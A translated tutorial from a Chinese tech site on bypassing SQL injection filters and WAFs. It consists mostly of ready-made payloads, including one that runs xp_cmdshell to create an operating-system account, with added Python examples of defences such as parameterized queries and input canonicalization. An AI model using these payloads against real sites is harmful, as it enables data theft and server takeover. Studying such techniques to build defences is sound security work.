千家信息网

What Are the Key Points of SQL Injection Bypass?

Published: 2025-11-15  Author: 千家信息网 editor

This article mainly introduces the key points of SQL injection bypass. The explanation is very detailed and has some reference value; interested readers should read to the end!

I. Approach to bypassing a WAF

Start from the first step, analyse bit by bit, then bypass.

1. Filtering and, or

preg_match('/(and|or)/i', $id)

Filtered injection: 1 or 1 = 1
Filtered injection: 1 and 1 = 1
Bypassed injection: 1 || 1 = 1
Bypassed injection: 1 && 1 = 1

2. Filtering and, or, union

preg_match('/(and|or|union)/i', $id)

Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'

3. Filtering and, or, union, where

preg_match('/(and|or|union|where)/i', $id)

Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'

4. Filtering and, or, union, where, limit

preg_match('/(and|or|union|where|limit)/i', $id)

Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

5. Filtering and, or, union, where, limit, group by

preg_match('/(and|or|union|where|limit|group by)/i', $id)

Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1

6. Filtering and, or, union, where, limit, group by, select

preg_match('/(and|or|union|where|limit|group by|select)/i', $id)

Filtered injection: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user,1,1) = 'a'

7. Filtering and, or, union, where, limit, group by, select, '

preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)

Filtered injection: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)

8. Filtering and, or, union, where, limit, group by, select, ', hex

preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)

Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))

9. Filtering and, or, union, where, limit, group by, select, ', hex, substr

preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)

Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)

10. Filtering and, or, union, where, limit, group by, select, ', hex, substr, whitespace

preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)

Filtered injection: 1 || lpad(user,7,1)
Bypassed injection: 1||lpad(user,7,1)
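The ten steps above are one blocklist losing ten rounds: every added keyword only moves the bypass. As an added example (not part of the original article), the following Python translates the step 1 and step 10 preg_match filters and contrasts them with a parameterized query against a constructed SQLite users table: the filter decides by spelling, while a bound parameter is compared as a value and never parsed as SQL, so even the classic 1 or 1 = 1 returns no rows. The table contents and helper names are my own; only portable SQL is executed, the article's MySQL-specific payloads are just run through the filters.

```python
import re
import sqlite3

# The article's preg_match blocklists, translated to Python. STEP1 is the first
# filter (and, or); STEP10 is the last one, which also rejects whitespace (\s).
STEP1 = re.compile(r"(and|or)", re.IGNORECASE)
STEP10 = re.compile(r"(and|or|union|where|limit|group by|select|'|hex|substr|\s)",
                    re.IGNORECASE)

def blocklist_allows(pattern: re.Pattern, user_input: str) -> bool:
    """True when the keyword filter would let the input reach the query."""
    return pattern.search(user_input) is None

def setup_db() -> sqlite3.Connection:
    """Constructed sample table; the users / user_id / user names follow the article."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "admin"), (2, "alice")])
    return conn

def lookup_concatenated(conn: sqlite3.Connection, user_input: str) -> list:
    """The pattern the blocklists try to protect: input spliced into the SQL text.
    Only portable SQL is run here; the article's MySQL-specific payloads (|| as OR,
    lpad, group_concat) are only passed through the filters, never executed."""
    sql = "SELECT user FROM users WHERE user_id = " + user_input + " ORDER BY user_id"
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterized(conn: sqlite3.Connection, user_input: str) -> list:
    """The fix: the driver binds the value, so it is compared, never parsed."""
    sql = "SELECT user FROM users WHERE user_id = ? ORDER BY user_id"
    return [row[0] for row in conn.execute(sql, (user_input,))]

def evaluate(user_input: str) -> dict:
    """Filter verdicts for one input, plus what the parameterized query returns."""
    conn = setup_db()
    try:
        return {
            "step1_allows": blocklist_allows(STEP1, user_input),
            "step10_allows": blocklist_allows(STEP10, user_input),
            "parameterized_rows": lookup_parameterized(conn, user_input),
        }
    finally:
        conn.close()
```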

II. Regex bypass

Bypass based on the fuzzy matching behaviour of the regex, e.g. when '=' is filtered:

Filtered injection: 1 or 1 = 1

Bypassed injection: 1 or 1
Bypassed injection: 1 or '1'
Bypassed injection: 1 or char(97)

e.g.:

Filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273

III. General bypasses

1. Comment symbols

?id=1+un/**/ion+se/**/lect+1,2,3--

2. Case variation

?id=1+UnIoN/**/SeLecT/**/1,2,3--

3. Keyword replacement

Some WAFs use preg_replace to replace SQL keywords (the second line is what is left after the replacement):

?id=1+UNunionION+SEselectLECT+1,2,3--
?id=1+union+select+1,2,3--

Sometimes the comment symbol '/**/' is itself filtered; that can be bypassed as well:

Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed : http://localhost/id/1||lpad(first_name,7,1).html

4. Encoding

A classic script: Nukesentinel.php

// Check for UNION attack
// Copyright 2004(c) Raven PHP Scripts
$blocker_row = $blocker_array[1];
if($blocker_row['activate'] > 0) {
  if (stristr($nsnst_const['query_string'],'+union+') OR
      stristr($nsnst_const['query_string'],'%20union%20') OR
      stristr($nsnst_const['query_string'],'*/union/*') OR
      stristr($nsnst_const['query_string'],' union ') OR
      stristr($nsnst_const['query_string_base64'],'+union+') OR
      stristr($nsnst_const['query_string_base64'],'%20union%20') OR
      stristr($nsnst_const['query_string_base64'],'*/union/*') OR
      stristr($nsnst_const['query_string_base64'],' union ')) {
    // block_ip($blocker_row);
    die("BLOCK IP 1 ");
  }
}

Forbidden: http://localhost/php/?/**/union/**/select
Bypassed : http://localhost/php/?/%2A%2A/union/%2A%2A/select
Bypassed : http://localhost/php/?%2f**%2funion%2f**%2fselect

5. Buffer overflow

http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10--

6. Inline comments (MySQL)

http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
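The Nukesentinel check in section 4 and the inline-comment payloads in section 6 fail the same way: the filter compares fixed spellings against the raw query string, so a percent-encoded '/' or '*' or a /*! ... */ wrapper never equals the literal it looks for. As an added example (not Nukesentinel's code or the article's), the following Python shows the defensive alternative, canonicalizing before inspecting: percent-decode until stable, treat '+' as a space, keep the body of MySQL executable comments, replace plain comments with whitespace, then match on the result; the three Forbidden/Bypassed URLs from section 4 all reduce to the same string. The helper names and the `\d{0,6}` version-prefix handling are my own.

```python
import re
from urllib.parse import unquote_plus

# MySQL executable comments /*!50000 ... */ keep their body; plain /* ... */ act as whitespace.
EXEC_COMMENT = re.compile(r"/\*!\d{0,6}(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
UNION_SELECT = re.compile(r"\bunion\s+select\b")

# The literal needles from the Nukesentinel snippet (stristr is case-insensitive).
RAW_NEEDLES = ("+union+", "%20union%20", "*/union/*", " union ")

def raw_literal_match(query_string: str) -> bool:
    """The article's approach: look for fixed spellings in the raw query string."""
    lowered = query_string.lower()
    return any(needle in lowered for needle in RAW_NEEDLES)

def canonicalize(query_string: str, max_rounds: int = 3) -> str:
    """Reduce a raw query string to roughly what the SQL parser would see."""
    decoded = query_string
    for _ in range(max_rounds):            # bounded, so double-encoding cannot loop forever
        nxt = unquote_plus(decoded)        # %2A -> *, %2F -> /, + -> space
        if nxt == decoded:
            break
        decoded = nxt
    kept = EXEC_COMMENT.sub(r" \1 ", decoded)    # /*!UnIoN*/ -> UnIoN
    stripped = PLAIN_COMMENT.sub(" ", kept)      # /**/ -> space
    return re.sub(r"\s+", " ", stripped).strip().lower()

def canonical_match(query_string: str) -> bool:
    """Inspect the canonical form, so encoding and comment tricks collapse."""
    return UNION_SELECT.search(canonicalize(query_string)) is not None

def compare(query_string: str) -> dict:
    """Side by side: raw literal check vs. check on the canonical form."""
    return {"raw": raw_literal_match(query_string),
            "canonical": canonical_match(query_string),
            "canonical_form": canonicalize(query_string)}
```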

IV. Advanced bypasses

1. HPP (HTTP Parameter Pollution)

For example, given index.php?par1=val1&par1=val2, each web server sees par1 as:

| web server | par1 |
| :- | :- |
| ASP.NET/IIS | val1,val2 |
| ASP/IIS | val1,val2 |
| PHP/Apache | val2 |
| JSP/Tomcat | val1 |

e.g.:

In an ASP/ASP.NET environment:

Forbidden: http://localhost/search.aspx?q=select name,password from users
Bypassed : http://localhost/search.aspx?q=select name&q=password from users
Bypassed : http://localhost/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users
Bypassed : http://localhost/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ net user test test /*&id=1*/ --
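The table above describes a parser differential: a filter that reads q the PHP way (last value) inspects a different string from the one an ASP.NET backend executes (all values joined). As an added example (not from the original article), the following Python encodes the table's four behaviours and offers two defensive checks: refuse any parameter that occurs more than once, or flag requests where the interpretations diverge. Server names and join rules come from the table; the helper names are my own.

```python
from urllib.parse import parse_qs

# How each server in the table exposes a repeated parameter: ASP and ASP.NET
# join the values with commas, PHP keeps the last, Tomcat keeps the first.
SERVER_RULES = {
    "ASP.NET/IIS": lambda values: ",".join(values),
    "ASP/IIS": lambda values: ",".join(values),
    "PHP/Apache": lambda values: values[-1],
    "JSP/Tomcat": lambda values: values[0],
}

def parameter_values(query_string: str, name: str) -> list:
    """All occurrences of one parameter, in order, blank values included."""
    return parse_qs(query_string, keep_blank_values=True).get(name, [])

def views_by_server(query_string: str, name: str) -> dict:
    """What each backend would hand to the application for this parameter."""
    values = parameter_values(query_string, name)
    if not values:
        return {}
    return {server: rule(values) for server, rule in SERVER_RULES.items()}

def is_polluted(query_string: str, name: str) -> bool:
    """Simplest defence: reject any request that repeats the parameter at all."""
    return len(parameter_values(query_string, name)) > 1

def backends_disagree(query_string: str, name: str) -> bool:
    """True when a filter using one server's interpretation could inspect a
    different string from the one the real backend executes."""
    return len(set(views_by_server(query_string, name).values())) > 1
```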

2. HPC (HTTP Parameter Contamination)

RFC 2396 defines the following character classes:

Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ( )
Reserved  : ; / ? : @ & = + $ ,
Unwise    : { } | \ ^ [ ] `

Different web servers apply different logic when handling specially crafted requests:

| Query String | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP |
| :- | :- | :- |
| ?test[1=2 | test_1=2 | test[1=2 |
| ?test=% | test=% | test= |
| ?test=1 | test= | test=1 |
| ?test=11 | NULL | test=1 |
| ?test+d=1+2 | test_d=1 2 | test d=1 2 |

e.g.:

Forbidden: http://localhost/?xp_cmdshell
Bypassed : http://localhost/?xp[cmdshell
Forbidden: http://localhost/test.asp?file=../flag.txt
Bypassed : http://localhost/test.asp?file=.%./flag.txt
Forbidden: http://localhost/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
Bypassed : http://localhost/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

That is the whole of the article "What Are the Key Points of SQL Injection Bypass?". Thank you for reading! We hope the content shared here is helpful; for more related knowledge, follow the industry news channel!
